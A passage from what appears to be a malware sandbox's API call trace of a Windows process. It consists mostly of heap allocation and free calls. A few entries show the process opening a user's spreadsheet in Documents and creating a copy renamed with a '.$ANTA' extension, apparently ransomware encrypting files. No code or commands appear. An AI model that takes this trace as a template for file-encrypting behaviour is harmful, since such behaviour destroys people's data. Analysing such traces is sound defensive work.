dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0076.154] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0076.154] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0076.154] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0076.154] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0076.154] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0076.154] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0076.154] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0076.154] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0076.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0076.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0076.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0076.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0076.154] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0076.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0076.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0076.154] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0076.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0076.155] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0076.155] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0076.155] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0076.155] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0076.155] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0076.155] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0076.155] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0076.155] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0076.155] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0076.155] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0076.155] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0076.155] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0076.155] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0076.155] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0076.155] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0076.155] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0076.155] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0076.155] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0076.156] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0076.156] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0076.156] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0076.156] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0076.156] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0076.156] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0076.156] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0076.156] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0076.156] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0076.156] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0076.156] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0076.156] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0076.156] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0076.156] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0076.156] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0076.156] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0076.156] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0076.156] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0076.156] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0076.156] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0076.156] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0076.156] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0076.156] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0076.156] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2788 | out: hHeap=0x1780000) returned 1 [0076.156] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0076.156] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0076.156] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0076.156] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0076.156] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0076.157] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0076.157] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0076.157] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0076.157] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0076.157] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0076.157] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0076.157] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0076.157] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0076.157] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0076.157] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0076.157] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0076.157] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0076.157] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0076.157] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0076.157] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0076.157] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0076.157] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0076.157] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0076.157] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0076.157] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0076.157] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0076.157] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0076.157] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9de8 | out: hHeap=0x1780000) returned 1 [0076.157] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0076.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0076.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eab80 [0076.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0076.157] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eab80 | out: hHeap=0x1780000) returned 1 [0076.157] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0076.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0076.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0076.158] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0076.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0076.158] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0076.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0076.158] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0076.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0076.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0076.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9de8 [0076.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0076.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0076.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0076.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0076.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0076.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0076.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0076.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eb3a8 [0076.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0076.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0076.158] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\CzDg7AgA6_wtvH.ods" (normalized: "c:\\users\\fd1hvy\\documents\\czdg7aga6_wtvh.ods"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0076.159] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.159] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0076.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0076.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0076.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23d0 [0076.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0076.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9de8 | out: hHeap=0x1780000) returned 1 [0076.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0076.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0076.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0076.159] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0076.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0076.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0076.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0076.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0076.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0076.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0076.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0076.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0076.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0076.159] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0076.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0076.160] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0076.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0076.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0076.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0076.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0076.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0076.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0076.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0076.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0076.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0076.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0076.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0076.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0076.160] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0076.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0076.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0076.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0076.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0076.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0076.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0076.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0076.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0076.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0076.160] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0076.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0076.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0076.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0076.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0076.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0076.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431e220 [0076.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0076.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0076.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0076.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0076.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431e220 | out: hHeap=0x1780000) returned 1 [0076.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0076.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0076.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0076.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0076.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0076.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d98 | out: hHeap=0x1780000) returned 1 [0076.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0076.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0076.161] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0076.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0076.161] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0076.161] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0076.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0076.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0076.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0076.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0076.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0076.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0076.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0076.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43fb3b0 [0076.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0076.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0076.162] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\CzDg7AgA6_wtvH.ods.$ANTA" (normalized: "c:\\users\\fd1hvy\\documents\\czdg7aga6_wtvh.ods.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0076.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0076.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0076.162] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0076.162] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0076.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0076.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0076.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0076.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0076.163] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0076.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0076.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0076.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0076.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0076.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0076.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0076.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0076.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0076.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0076.163] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0076.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0076.163] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0076.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0076.163] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0076.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0076.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0076.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0076.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0076.163] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0076.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0076.163] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0076.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0076.164] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0076.164] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 